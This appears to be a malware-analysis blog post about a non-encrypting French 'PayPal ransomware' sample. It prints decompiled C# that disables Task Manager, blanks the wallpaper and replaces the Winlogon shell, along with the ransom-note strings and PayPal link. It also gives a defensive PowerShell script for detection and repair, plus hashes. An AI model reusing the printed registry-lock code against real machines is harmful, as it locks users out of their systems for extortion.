Funny Paypal Ransomware
Today I want to talk about a funny PayPal ransomware that @malwarehunterteam on Twitter found.
MD5: 21558297004d9fa927bb720a0af8836c
Basic facts about the sample
At first glance it looks like ransomware, but it does not encrypt anything. All it does is set three registry values:

using Microsoft.Win32;

// Disable Task Manager for the current user. The value is written as a REG_SZ "1"
// (RegistryValueKind.String), not the REG_DWORD this policy normally uses.
RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
registryKey.SetValue("DisableTaskMgr", 1, RegistryValueKind.String);
// Clear the current user's wallpaper path.
RegistryKey registryKey2 = Registry.CurrentUser.CreateSubKey("Control Panel\\Desktop");
registryKey2.SetValue("Wallpaper", "", RegistryValueKind.String);
// Replace the machine-wide logon shell (explorer.exe by default) with "empty",
// so the user gets no desktop at the next logon. This is the only real "lock".
RegistryKey registryKey3 = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon");
registryKey3.SetValue("Shell", "empty", RegistryValueKind.String);

Two things worth noting. The first two writes go to HKCU and affect only the user who ran the sample. The Winlogon write goes to HKLM, which a standard user can read but not write, so unless the sample is run elevated that call fails with an access-denied error and the lock never takes effect.
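As an added example (this is not code from the sample or from the original post), the following PowerShell checks the three values the sample touches and reverses the ones that persist across logons. The `$Indicators` table and the function names `Get-R2l2Indicator` and `Repair-R2l2Indicator` are names chosen for this example.

```powershell
# Added example, not code from the sample: triage the three registry values the sample
# writes and undo the two that persist across logons. Run from an elevated PowerShell
# session in the affected user's context (DisableTaskMgr and Wallpaper are per-user
# under HKCU; the Winlogon Shell value is machine-wide under HKLM).
# $Indicators, Get-R2l2Indicator and Repair-R2l2Indicator are names chosen for this example.

$Indicators = @(
    [pscustomobject]@{
        Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
        Name = 'DisableTaskMgr'
        Note = 'Task Manager policy; the sample writes REG_SZ "1" (normally a REG_DWORD)'
    }
    [pscustomobject]@{
        Path = 'HKCU:\Control Panel\Desktop'
        Name = 'Wallpaper'
        Note = 'Wallpaper path cleared to an empty string'
    }
    [pscustomobject]@{
        Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
        Name = 'Shell'
        Note = 'Logon shell replaced; "empty" means no Explorer desktop at next logon'
    }
)

function Get-R2l2Indicator {
    # Emits one object per value: current content plus whether it matches what the sample sets.
    foreach ($i in $Indicators) {
        $item  = Get-ItemProperty -Path $i.Path -Name $i.Name -ErrorAction SilentlyContinue
        $value = if ($null -ne $item) { $item.$($i.Name) } else { $null }
        $hit = switch ($i.Name) {
            'DisableTaskMgr' { ($null -ne $value) -and ("$value" -ne '0') }
            'Wallpaper'      { ($null -ne $value) -and ("$value" -eq '') }
            'Shell'          { ($null -ne $value) -and ("$value" -ne 'explorer.exe') }
        }
        [pscustomobject]@{
            Name       = $i.Name
            Suspicious = [bool]$hit
            Value      = $value
            Path       = $i.Path
            Note       = $i.Note
        }
    }
}

function Repair-R2l2Indicator {
    # Undoes the changes that matter after a reboot. Supports -WhatIf so it can be rehearsed first.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($r in Get-R2l2Indicator | Where-Object Suspicious) {
        $target = "$($r.Path)\$($r.Name)"
        switch ($r.Name) {
            'DisableTaskMgr' {
                if ($PSCmdlet.ShouldProcess($target, 'Remove value')) {
                    Remove-ItemProperty -Path $r.Path -Name $r.Name
                }
            }
            'Shell' {
                if ($PSCmdlet.ShouldProcess($target, 'Restore explorer.exe')) {
                    Set-ItemProperty -Path $r.Path -Name $r.Name -Value 'explorer.exe' -Type String
                }
            }
            'Wallpaper' {
                # The original path is not recoverable from this value; leave the choice to the user.
                Write-Warning "$target is empty; choose a wallpaper again via Settings."
            }
        }
    }
}

Get-R2l2Indicator | Format-Table Name, Suspicious, Value, Path -AutoSize
Repair-R2l2Indicator -WhatIf   # drop -WhatIf to apply the changes
```

If the affected user no longer gets a desktop after logon, run this from another administrator account: restore the Shell value first (it is the only machine-wide change), then fix the two HKCU values from inside the affected user's own session, since they live in that user's hive.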
They also showed some creativity in the ransom note: it is not a text file but an interactive Windows Forms dialog. The strings are French; English translations are given in the comments.

this.groupBox1.Text = "Rançon";   // "Ransom"
this.label8.AutoSize = true;
this.label8.Location = new Point(21, 191);
this.label8.Name = "label8";
this.label8.Size = new Size(166, 25);
this.label8.TabIndex = 4;
this.label8.Text = "Il Reste 30min...";   // "30 min remaining..."
this.label7.AutoSize = true;
this.label7.Location = new Point(21, 149);
this.label7.Name = "label7";
this.label7.Size = new Size(650, 25);
this.label7.TabIndex = 3;
this.label7.Text = "Si le Payement n'est pas reçu nous effacerons toutes vos données";   // "If payment is not received we will erase all your data"
this.label5.AutoSize = true;
this.label5.Location = new Point(21, 113);
this.label5.Name = "label5";
this.label5.Size = new Size(674, 25);
this.label5.TabIndex = 2;
this.label5.Text = "Une Fois que les 50 EUR Paypal sont envoyers nous vous libereront.";   // "Once the 50 EUR PayPal are sent we will release you."
this.label4.AutoSize = true;
this.label4.Location = new Point(21, 76);
this.label4.Name = "label4";
this.label4.Size = new Size(584, 25);
this.label4.TabIndex = 1;
this.label4.Text = "50 EUR PayPal Pour que la rançon se supprime de votre pc";   // "50 EUR PayPal for the ransom to remove itself from your PC"
The PayPal.Me link the victim is asked to pay to:
[Paypal link: https://www.paypal.com/paypalme/AbsoDev]
Clicking the button simply opens that URL; Process.Start on a URL hands it to the shell, which launches the default browser:
private void button1_Click(object sender, EventArgs e)
{
    // Open the PayPal.Me page in the default browser.
    Process.Start("https://www.paypal.com/paypalme/AbsoDev");
}
The countdown "timer" is also just static text in a label, not a running timer:
this.label6.Text = "2j 23h 59min...";   // "2d 23h 59min..."
That is all there is to the r2l2 ransomware.
Some facts about the sample
MD5: 21558297004d9fa927bb720a0af8836c
SHA256: f6bc8adf88d2fd6d124683176c4b3208ee9d47904482e40e323851ee2d67dfcb
It is a 32-bit .NET executable with three sections:
- .text
- .rsrc
- .reloc
[Note: If anyone has an issue with the digest or the blog, ping me on Twitter :) and I will take it down.]